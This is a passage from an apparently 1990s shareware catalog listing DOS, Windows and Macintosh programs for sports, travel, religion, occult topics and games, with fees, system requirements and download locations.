51/4" + master disk(s); lifetime unlimited phone, mail support. 6-month + return policy. + Look for: availability unknown on BBSs. + Download size: 273k (about 21 minutes with a 2400 baud modem) + Description: + Complete, easy to use basketball statistics program. Features + include a modern user interface with quick drop-down menus and + dialog boxes, four different report generation categories (team + single game, season games, season players, season single + player), custom report generation, custom performance rating + formulas, the ability to view reports on the screen, print + them, or save them to a file, and context-sensitive help. + + Chapter 15, "Home & hobby" 578 + + + + Product: FastBreak Fantasy Basketball + Author: , 707-725-6016 + Version: 3.08 (02-18-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor. + Strongly recommended: VGA monitor. + Registration fee: $35.00 + Registration benefits: lifetime unlimited mail support; bonus + utilities; bonus data; all ASP-wide offers (see page 5); disks + of other shareware; discounts on other products. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; FB308.ZIP on CompuServe + in CIS:LIBRARY forum LIBrary 0. + Download size: 268k (about 20 minutes with a 2400 baud modem) + Description: + Runs a Fantasy or Rotissiere basketball league for up to 15 + teams. Automatic update utility allows updating using download + files from the USA Today Sports Center. + + + Product: League Manager + Manages any youth sports organization. See full description on + page 575. + + 15.24.5 Boating sports + + Product: Marnav + Author: + Version: 4.5 (09-12-95) + Needs: IBM PC, DOS 2.0 or better. 70k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $35.00 + Registration benefits: printed manual; 51/4" master disk(s); 6 + months of unlimited CompuServe, mail support; 1-month limited + return policy; bonus data; all ASP-wide offers (see page 5). + Look for: MARNAV45.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A program to convert GPS (Lat/Lon) coordinates to LORAN Delays + and vice versa. Also calculates heading and distance from point + A to point B with point coordinates specified in either GPS or + LORAN coordinates. It also performs time/speed/distance + calculations and provides optional hard copy of all operations + for trip planning. An editor allows the addition of LORAN data. + + + 15.24.6 Firearms + + See also: Home & hobby, Scouting; Home & hobby, Hunting & + fishing. + + Chapter 15, "Home & hobby" 579 + + + + Product: QBALL + Author: + Version: 2.40 (06-01-94) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. Dot matrix printer. + Strongly recommended: EGA monitor; Hard disk; Epson printer. + Registration fee: $25.00 (add $7.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; discounts on other products; + discounts on upgrades. Lifetime free upgrading allowed. 1 + free update disk(s) sent out. + Look for: QBALL240.ZIP on BBSs (call 718-837-3236 to download it + at no charge); QBAL24.ZIP on CompuServe in CIS:OUTDOOR forum + LIBrary 14 (or contact userID 70033,2612 for assistance); + QBALL240.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID B.HARTLEY1 for assistance). + Download size: 366k (about 27 minutes with a 2400 baud modem) + Description: + Compute: trajectory data, remaining velocity and energy, wind + deflection, time of flight, ballistic coefficients, slant fire + & crosswind corrections, point blank range, gun free recoil, + muzzle velocity (2 methods). Display 15 trajectories at once. + Tables output as hardcopy/save to file. User configurable + display & defaults. Utilities: translate graphics, read range + tables, install; reformat documentation; modify bullet lookup + data. On-disk user's manual. + + + 15.24.7 Football + st + Product: 1 &goal Fantasy Football + Author: , 707-725-6016 + Version: 3.07 (01-31-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; 1ST37.ZIP on CompuServe + in CIS:CIS forum LIBrary 0. + Download size: 226k (about 17 minutes with a 2400 baud modem) + Description: + Runs a fantasy football league for up to 15 teams based on your + choice of any or all of 12 statistics. Compatable with US Today + Sports Center download files. + + Chapter 15, "Home & hobby" 580 + + + + Product: Keyboard Coach Fantasy Football + Author: , 707-725-6016 + Version: 1.03 (01-08-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; KCB103.ZIP on CompuServe + in CIS:CIS forum LIBrary 0. + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + Runs a fantasy football league for 4 to 12 teams. Competition + is head-to-head and league standings are based on games won/ + lost. Games played based on actual NFL players stats in 12 + categories. + + + Product: League Manager + Manages any youth sports organization. See full description on + page 575. + + Product: NFL Forecaster for DOS + Author: , 717-289-4019 + Version: 2.0d (08-15-94) + Needs: IBM PC, DOS 3.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $20.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; bonus data; all ASP- + wide offers (see page 5); discounts on other products; + discounts on upgrades. Discount coupon for annual update disk; + rebate for teachers. + Look for: ODNFL20.ZIP on BBSs. + PsL#: 11343 + Download size: 254k (about 19 minutes with a 2400 baud modem) + Description: + Using ONLY scores, this program ranks each team & predicts + winners & spreads of NFL games. The user is guided step-by-step + through the process of entering scores, forecasting spreads, + saving data, viewing rankings & printing reports. Requires only + 10 minutes per week. Prints 5 reports and the schedule; 6 view + windows; sorts 8 ways. Handles playoff & non-scheduled games. + Highly configurable. Saves each week's rankings, scores & + spreads. Function for creating new season's schedule. Accurate. + + Chapter 15, "Home & hobby" 581 + + + + Product: NFL Forecaster for Windows + Author: , 717-289-4019 + Version: 3.0w (06-01-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; bonus data; discounts + on other products; discounts on upgrades. Discount coupon for + annual update disk; rebate for teachers. + Look for: FCAST30W.ZIP on BBSs. + PsL#: 11343 + Download size: 304k (about 23 minutes with a 2400 baud modem) + Description: + Using ONLY scores, this program ranks each team & predicts + winners & spreads of NFL games. The user is guided step-by-step + through the process of entering scores, forecasting spreads, + saving data, viewing rankings & printing reports. Requires only + 10 minutes per week. Prints 5 reports & the schedule; 6 view + windows; sorts 8 ways. Handles playoff & non-scheduled games. + Highly configurable. Saves each week's rankings, scores & + spreads. Function for creating new season's schedule. Accurate. + + + 15.24.8 Golf + + Product: Golf Tournament Scorekeeper + Author: , 403-425-4404 + Version: 1.2 (07-04-94) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, GEnie, + mail support; bonus utilities; all ASP-wide offers (see + page 5). + Look for: GOLFTS12.ZIP on BBSs; GOLFTS.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 9 (or contact userID 75240,243 for + assistance); GOLFTS12.ZIP on GEnie in SPORTS forum LIBrary 12 + (or contact userID B.LANE4 for assistance). + SWREG#: 1978 + Download size: 183k (about 14 minutes with a 2400 baud modem) + Description: + Calculates gross and net scores with a choice of handicapping + methods. Outputs a sorted leader board to screen or printer. + Allows up to 10 separate flights and team play including best + ball scoring. Provides a handicap for the unhandicapped using + the Callaway system. Has a Callaway hidden holes option and + many comprehensive reports. Reduces time spent caculating + standings from hours to minutes. + + Chapter 15, "Home & hobby" 582 + + + + Product: Golfhcap + Author: + Version: 5.5 (09-12-95) + Needs: IBM PC, DOS 2.0 or better. 150k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $35.00 + Registration benefits: printed manual; 51/4" master disk(s); 6 + months of unlimited CompuServe, mail support; 1-month limited + return policy; all ASP-wide offers (see page 5). + Look for: GLFHCP55.ZIP on BBSs (call 508-875-3618 to download it + at no charge). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Not only calculates golfer's handicaps using the USGA Slope + system but also prints membership lists, mailing labels, score + input forms, handicap index cards as well as a monthly report + showing scores used, old and new handicap indexes for each + golfer. Also provides a printout of the handicapping data for + any single golfer to help resolve any problems. Will handle up + to 12 groups of golfers with each group having up to 500 + golfers. + + + 15.24.9 Martial arts + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 532. + + 15.24.10 Soccer/rugby + + Product: League Manager + Manages any youth sports organization. See full description on + page 575. + + 15.24.11 Other + + Product: AeroChart + Exercise charting and motivation program. See full description + on page 549. + + Chapter 15, "Home & hobby" 583 + + + + Product: ALL-PRO League Scheduler + Author: , 608-271-1586 + Version: 1.1 (01-17-95) + Needs: IBM PC, DOS 3.2 or better. 640k RAM; CGA monitor; Hard + disk; Mouse. + Registration fee: $49.95 (add $3.75 for shipping to U.S. + addresses) (add $3.75 for shipping to Canadian addresses) (add + $3.75 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, mail support; + lifetime return policy; discounts on upgrades. + Look for: APSLS11.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Schedules games for any number of leagues, 40 teams per league, + at any number of locations. Handles division play, tracks + scores, and creates standings. Lets you customize and edit the + schedule. Displays and prints reports. Mouse support, menu- + driven and very easy to use! + + + Product: Book-It + Membership and activity booking system. See full description + on page 318. + + Product: Landscape Explorer + 3D landscape visualization tool. See full description on + page 508. + + Product: Me & My Metabolism + Effects of lifestyle on your energy balance. See full + description on page 479. + + Product: SwimBase + Author: , 301-855-6427 + Version: 2.04 (07-15-93) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Registration fee: $49.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, mail support. + Look for: SWIMDB20.ZIP on BBSs; SWIMDB.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 9 (or contact userID 76515,1510 for + assistance). + Download size: 302k (about 23 minutes with a 2400 baud modem) + Description: + An easy to use, menu driven program to keep all the data + required for a swim team. The swimmers' personal data is stored + along with all event, meet and season results. Team rosters, + address lists, swimmer results, event results and meet results + are some of the reports that can be prepared. All event names, + event numbers, event scoring and age groups are user-definable. + + Chapter 15, "Home & hobby" 584 + + + + Swim meet management functions are also included. Can be user + configured to support USS, NF or USMS teams. + + + 15.25 Travel + + Product: National INNdex + Author: , 708-965-7325 + Version: 5.05 (05-01-95) + Needs: IBM PC, DOS 3.3 or better. 400k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 1-month + return policy; bonus data. 6-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: NATINN.ZIP on BBSs; NATINN.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 17 (or contact userID 70274,1772 for + assistance). + SWREG#: 4536 + PsL#: 11770 + Download size: 252k (about 19 minutes with a 2400 baud modem) + Description: + At last! Help for the road warrior or vacationing family. This + motel locator will find a motel in almost any town in the USA + of several thousand or more population. Simply select the + state and town you plan to visit, and National INNdex displays + or prints an attractive list of motels complete with national + chain affiliation, location, phone numbers and basic amenities. + Includes 2,200+ motels. + + + 15.26 Other + + Product: Computerized Christmas Cards [***] + Author: , 619-346-6609 + Version: 1.3 (10-01-95) + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, CompuServe, mail support; 1-month + return policy; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. Free copy of + Computerized Birthday Cards. + Look for: CXMASC13.ZIP on BBSs. + Download size: 351k (about 26 minutes with a 2400 baud modem) + Description: + You select from 3 different Xmas cards, personalize with a + scrolling message up to 255 characters long, and the program + saves your card to a floppy disk. It's written in DOS so send + it to anyone who has access to IBM/compatible EGA/better. The + cards play 10 Xmas carols. It's easy to use and lots of fun to + send and receive! The program is also a great customer + relations device for businesses. Program comes with + + Chapter 15, "Home & hobby" 585 + + + + instructions on how to order up to 12 different cards for other + holidays and occasions. + + + Product: Computerized Valentine Cards [***] + Author: , 619-346-6609 + Version: 1.1 (10-01-95) + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of unlimited phone, CompuServe, mail support; 1-month + return policy; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. Free copy of + Computerized Holiday Cards. + Look for: LOVE11.ZIP on BBSs. + Download size: 356k (about 27 minutes with a 2400 baud modem) + Description: + You select from 3 Valentine (2 can also be used as anniversary) + cards, personalize with a scrolling message up to 255 + characters long, and the program saves your card to a floppy + disk. Send the DOS card to anyone who has access to a IBM/ + compatible EGA/better. The cards play several old love songs. + The program is very user friendly and the cards are fun to + create and receive. The program comes with instructions on how + to order up to 12 different cards for other holidays and + occasions. + + Chapter 16, "Religion & philosophy" 586 + + + + + + Chapter 16 + Religion & philosophy + + See also: Home & hobby, Fortune telling & astrology. + + + 16.1 The Bible + + Product: New Testament for Windows + Author: , 303-679-1662 + Version: 1.61 (04-04-94) + Needs: IBM AT (80286), Windows 3.0 or better. 2000k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $14.95 (add $2.00 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; + 3-month limited return policy; bonus utilities; discounts on + other products. + Look for: availability unknown on BBSs; NT4W16.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 75540,600 + for assistance). + SWREG#: 2485 + Download size: 680k (about 51 minutes with a 2400 baud modem) + Description: + Features the complete King James text of the New Testament in + an intuitive, easy-to-use, 3D graphical user interface. It + includes powerful text search software, color maps, timeline, + personal notes linked to the corresponding Scripture, tutorial, + context-sensitive help, and study-aids with topical hypertext + links to events, parables and miracles in the life of Christ. + Over 40,000 copies in use. + + Chapter 16, "Religion & philosophy" 587 + + + + 16.1.1 Bible programs + + Product: Bible Timeline + Author: , 206-523-6135 + Version: 2.14 (03-01-93) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 5); disks of other shareware; discounts + on other products. + Look for: availability unknown on BBSs; BTL.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 76703,3046 for + assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + How old was Abraham when Jacob was born? Who were the Kings + of Israel and Judah when the Iliad was written? What Biblical + leaders were alive when the first Olympic games were held? This + lets you sort and selects individual people and events, or + groups and factions, to develop new insights and trace patterns + across different eras and cultures. You can modify or expand + any of the datasets. Useful for sermon research, Bible, + history and art students, teachers, + + + 16.2 For houses of worship + + See also: Database applications. + + Product: CMTS (Church Mbr. Tracking Sys) + Author: , 804-488-5506 + Version: 3.3 (10-01-93) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $389.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of tollfree 800# phone, fax, BBS, + CompuServe, mail support; royalty-free runtime license; site + license; discounts on other products; discounts on upgrades. + Look for: CMTS33A.ZIP on BBSs (multiple files) (call 804-488-4146 + to download it at no charge); CMTSA.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 10 (multiple files) (or contact userID + 73747,2336 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Winner of Public Brand Software's 12th annual contest - + applications, this is the church management system that does it + all. Membership, donations, fund accounting, attendance, + visitation, event tracking and an optional report writer round + + Chapter 16, "Religion & philosophy" 588 + + + + out this fully integrated system. One of the best church + management systems available, competing with commercial church + systems in the $2000-$5000 price range. + + + Product: ProDev*MEMBER Church System + Author: , 616-788-2243 + Version: 3.0g (01-16-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Hard disk. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 3-month return policy; discounts on upgrades. + Look for: PDMEMB3G.ZIP on BBSs; PDMEMB.EXE on CompuServe in + CIS:PCAPP forum LIBrary 9 (multiple files) (or contact userID + 72617,1266 for assistance). + Download size: 478k (about 36 minutes with a 2400 baud modem) + Description: + Tracks address, children, attendance, giving, jobs, talents and + any information for anyone walking in the church door. Allows + fast posting of giving and attendance. Unlimited text notes + window per member with search features. Many reports, + statements, labels and rotary file card runs with very flexible + filtering. F1 Help. + + + Product: RANGER TRACKER + Author: , 301-490-7104 + Version: 2.0 (07-08-94) + Needs: IBM PC, DOS 3.0 or better. 510k RAM; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime tollfree 800# phone, fax, CompuServe, mail + support; 3-month limited return policy; all ASP-wide offers + (see page 5); disks of other shareware; discounts on upgrades. + 1 free update disk(s) sent out. + Look for: RRTR20.ZIP on BBSs; RRTR20.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 0 (or contact userID 100014,2347 for + assistance). + Download size: 327k (about 25 minutes with a 2400 baud modem) + Description: + A menu-driven program which stores information on the Youth and + Adults of an Outpost. Will generate Ranger and Commander + rosters as well as a roster of former members, mailing labels, + an individual record for each Ranger or Commander, and an + attendance summary for all Rangers. Trackes Advancement, + Advanced Merits earned, Outpost and/or Patrol offices served, + and all training received. + + Chapter 16, "Religion & philosophy" 589 + + + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 609. + + + 16.3 New age/occult + + Product: ASTRO + Astrology program. See full description on page 530. + + Product: ASTRO For Windows + Astrology program. See full description on page 530. + + Product: By the Numbers + Personality analysis with Numerology. See full description on + page 531. + + Product: ESPTEST + Parapsychology tool. See full description on page 478. + + Product: Fortune Teller + Seven ways to tell fortunes, plus ESP test. See full + description on page 532. + + Product: Geomancy + Author: + Version: 4.7 (05-19-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: GEO47.ZIP on BBSs; GEO.ZIP on CompuServe in CIS:PCVENK + forum LIBrary 9 (or contact userID 74774,403 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + This is an ancient system of divination, sometimes associated + with black magic. Originally based on stones tossed in a + circle, modern Geomancy uses your selection of dot patterns to + create an Astro-Geomantic chart and answer your questions. + Provides an explanation of Geomantic figures. Readings can be + saved, edited, printed. + + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 532. + + Product: Mayan Calendar + Converts Mayan/modern calendar dates. See full description on + page 533. + + Chapter 16, "Religion & philosophy" 590 + + + + Product: NUMERO UNO + Numerology program. See full description on page 533. + + Product: Personal Tarot + Fortune telling with Tarot cards. See full description on + page 534. + + Product: Wynter Stone's I Ching + I CHING fortunes and philosophy. See full description on + page 535. + + Product: Wynter Stone's Quick Guide + Mini-encyclopedia of mystical information. See full + description on page 535. + + Product: Your ESP Test + Find out if you have psychic powers! See full description on + page 535. + + + 16.4 Philosophy + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 532. + + Product: THE MAGIC OF THE MIND + Author: + Version: 1.0 (10-13-93) + Needs: IBM AT (80286), Windows 3.0 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Dual 720k floppy drives; Hard disk. + Registration fee: A:$10.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of BBS, mail support; all ASP-wide + offers (see page 5). + Look for: BOOK.ZIP on BBSs. + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + An absorbing and contentious new evaluation of the + peculiarities and diversities of human behavior, presented as a + non-assertive but philosophical awakening to reality. Any + person who reads this book must become an even better person. + Suitable for adolescents and adults alike. Don't miss out on + this dynamic and facinating reading experience. + + + 16.4.1 Metaphysics + + Product: ASTRO + Astrology program. See full description on page 530. + + Product: ASTRO For Windows + Astrology program. See full description on page 530. + + Chapter 16, "Religion & philosophy" 591 + + + + Product: By the Numbers + Personality analysis with Numerology. See full description on + page 531. + + Product: ESPTEST + Parapsychology tool. See full description on page 478. + + Product: Fortune Teller + Seven ways to tell fortunes, plus ESP test. See full + description on page 532. + + Product: Geomancy + Ancient system of divination with black magic. See full + description on page 589. + + Product: NUMERO UNO + Numerology program. See full description on page 533. + + Product: Personal Tarot + Fortune telling with Tarot cards. See full description on + page 534. + + Product: Wynter Stone's I Ching + I CHING fortunes and philosophy. See full description on + page 535. + + Product: Your ESP Test + Find out if you have psychic powers! See full description on + page 535. + + + 16.5 Software tools & add-ins + + 16.5.1 For other + + Product: CHRONOS + Interactive historical timelines. See full description on + page 473. + + Product: Word Search Puzzle Maker [***] + Creates shaped printed word search puzzles. See full + description on page 635. + + Chapter 16, "Religion & philosophy" 592 + + + + 16.6 Other + + Product: Bible Timeline for Windows + Author: , 206-523-6135 + Version: 1.10 (08-10-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; WITBTL.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 14 (or contact userID 76703,3046 + for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + When were the gospels written? Who ruled Babylon and Egypt + during Biblical times? This lets you sort and selects + individual people and events, or groups and factions, to + develop new insights and trace patterns across different eras + and cultures. You can modify or expand any of the datasets. + + + Product: Visual Illustrations [***] + Author: , 619-346-6609 + Version: 1.1 (10-01-95) + Registration fee: $7.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited phone, + CompuServe, mail support; 1-month return policy; all ASP-wide + offers (see page 5); discounts on other products. 15 more + object lessons for a total of 25. + Look for: OBJECTLS.ZIP on BBSs. + Download size: 165k (about twelve minutes with a 2400 baud modem) + Description: + This computerized book contains 10 of the most powerful + Christian object lessons you will find anywhere. These easy to + do visually exciting lessons can be used for children's + worship, Sunday School, youth groups, Vacation Bible School, + summer camp, and even sermon starters or illustrations. Some of + the things you will learn from using this book will give you + tools that can be used to create your own exciting visual + effects. Comes complete with graphic diagrams where needed. + + Chapter 17, "Games" 593 + + + + + + Chapter 17 + Games + + See also: Home & hobby, Lottery; Education, Computers, + Educational computer games. + + + 17.1 Adventure + + Product: Dave Dude + Author: + Version: 2.1 (05-14-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse; XMS memory; VBRUN200.DLL. 640x480x16 video + mode required. + Strongly recommended: sound card. + Registration fee: $18.00 + Registration benefits: Full program functionality; 3 months of + unlimited CompuServe, mail support; bonus game levels; all ASP- + wide offers (see page 5); discounts on upgrades. + Look for: availability unknown on BBSs; DD95.ZIP on CompuServe in + CIS:GAMERS forum LIBrary 2 (or contact userID 100552,1570 for + assistance). + SWREG#: 5654 + PsL#: 11997 + Download size: 777k (about 58 minutes with a 2400 baud modem) + Description: + The first real adventure game for Microsoft Windows. The + newcomer APG released a completely animated game. Nearly the + whole screen is used for graphics. You're controlling Dave Dude + with the mouse; you don't have to enter any text. Just click + around and select actions and objects with your mouse. More + than 15 different screens garantee fun and entertainment for + hours. A must for fans of the LucasArts-Adventures... + + Chapter 17, "Games" 594 + + + + Product: Exile: Escape From the Pit + Author: , 908-545-7552 + Version: 1.0.3 (09-08-95) + Needs: IBM 80386, Windows 3.0 or better. 2000k RAM; Hard disk; + Mouse; sound card. + Strongly recommended: VGA monitor. + Registration fee: $25.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; lifetime unlimited + CompuServe, mail support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + PsL#: 14127 + Download size: 1700k (about 126 minutes with a 2400 baud modem) + Description: + A huge, highly detailed, intricate fantasy role-playing game. + Explore an enormous outdoors containing almost 80 towns and + dungeons, three game-winning quests, smaller missions, scads of + NPCs, and multitudes of puzzles. The plot? You wander through + Exile, an underground world of long passages and enormous + caverns, containing people banished from the surface world for + the crime of being too different. Your mission? Escape? Gain + power? It's your choice! Great graphics. Compatible with Win95. + + + Product: Exile: Escape From the Pit + Author: , 908-545-7552 + Version: 1.2 (09-08-95) + Needs: Macintosh, System 7.0.0 or better. 2000k RAM; Hard disk; + Mouse. + Registration fee: $25.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; lifetime unlimited + CompuServe, mail support; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + A huge, highly detailed, intricate fantasy role-playing game. + Explore an enormous outdoors containing almost 80 towns and + dungeons, three game-winning quests, smaller missions, scads of + NPCs, and multitudes of puzzles. The plot? You wander through + Exile, an underground world of long passages and enormous + caverns, containing people banished from the surface world for + the crime of being too different. Your mission? Escape? Gain + power? It's your choice! Great graphics. + + + Product: MAZE3 + 3D maze/cave creation and exploration game. See full + description on page 617. + + Product: Puffwort's Evil Scheme [***] + Game reveals deception in tobacco advertising. See full + description on page 482. + + Chapter 17, "Games" 595 + + + + Product: T-Zero + Author: , 503-227-7751 + Version: 1.04 (11-30-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; all ASP-wide offers + (see page 5). 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: T-ZERO.ZIP on BBSs (call 414-789-4210 to download it at + no charge); T-ZERO.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 2 (or contact userID 71107,3037 for assistance); T- + ZERO.ZIP on GEnie in IBMPC forum LIBrary 7. + Download size: 232k (about 17 minutes with a 2400 baud modem) + Description: + This game, mixing elements of fantasy and science fiction while + exploring the nature of time, is dedicated to all gamers + saddened by the premature death knell sounded for text + adventures. Scenes take place in a rustic but disturbing + present; a bustling prehistoric era; and a damaged bureaucratic + future. Features: input buffer, player-definable function + keys, DOS shell, restart/save/restore/undo, directional or + cursor keyboard control, hard copy of game's prose, hint file. + Expert level. + + + Product: Volcano Hunter + Author: , 202-675-4528 + Version: 1.0 (06-15-91) + Needs: IBM AT (80286), DOS 3.1 or better. 16MHz or faster + computer. VGA monitor. + Registration fee: $10.00 + Registration benefits: A printed map of the screens in Volcano + Hunter; Several evaluation versions of other software from + Informative Technologies; A certificate for $7 off a + subscription to Shareware Magazine; A certificate for a free + CompuServe membership. + Look for: VOLCANO.ZIP on BBSs (call 301-596-1180 to download it + at no charge); VOLCAN.ZIP on CompuServe in CIS:PCFUN forum + LIBrary 3 (or contact userID 74777,3004 for assistance). + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + Monsters, treacherous ledges, hot lava, water-filled caverns, + conveyor belts, moving platforms, beamers, secret doors, + hotplates, timer bombs and more contribute to the action. Over + 200 screens of cities, mountains and caverns. Blow up, burn up, + drown, fall to your death or be killed by the Druts. But, you + could survive and escape with gold beyond your imagination and + save the city. + + Chapter 17, "Games" 596 + + + + 17.2 Arcade games + + Product: O.R.B.Y. + Author: , 604-229-4766 + Version: 1.0 (12-21-93) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; EGA monitor; Hercules monitor. + Strongly recommended: VGA monitor. + Registration fee: $12.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, mail support. + Look for: ORBY10.ZIP on BBSs (multiple files); ORBY10.ZIP on + CompuServe in CIS:GAMERS forum LIBrary 7 (or contact userID + 71431,1673 for assistance). + Download size: 81k (about six minutes with a 2400 baud modem) + Description: + Orbit Rebound Bankshot Yaw...a game that combines elements of + hockey, billiards, and planetary orbits. Use strategy to score + goals with orbiting planets. Play against another person, or + see if you can beat the computer. Keyboard input, high scores + hall of fame, sound toggle on/off. + + + Product: Shooting Gallery + Author: + Version: 3.3 (02-07-95) + Needs: IBM PC, DOS 2.1 or better. 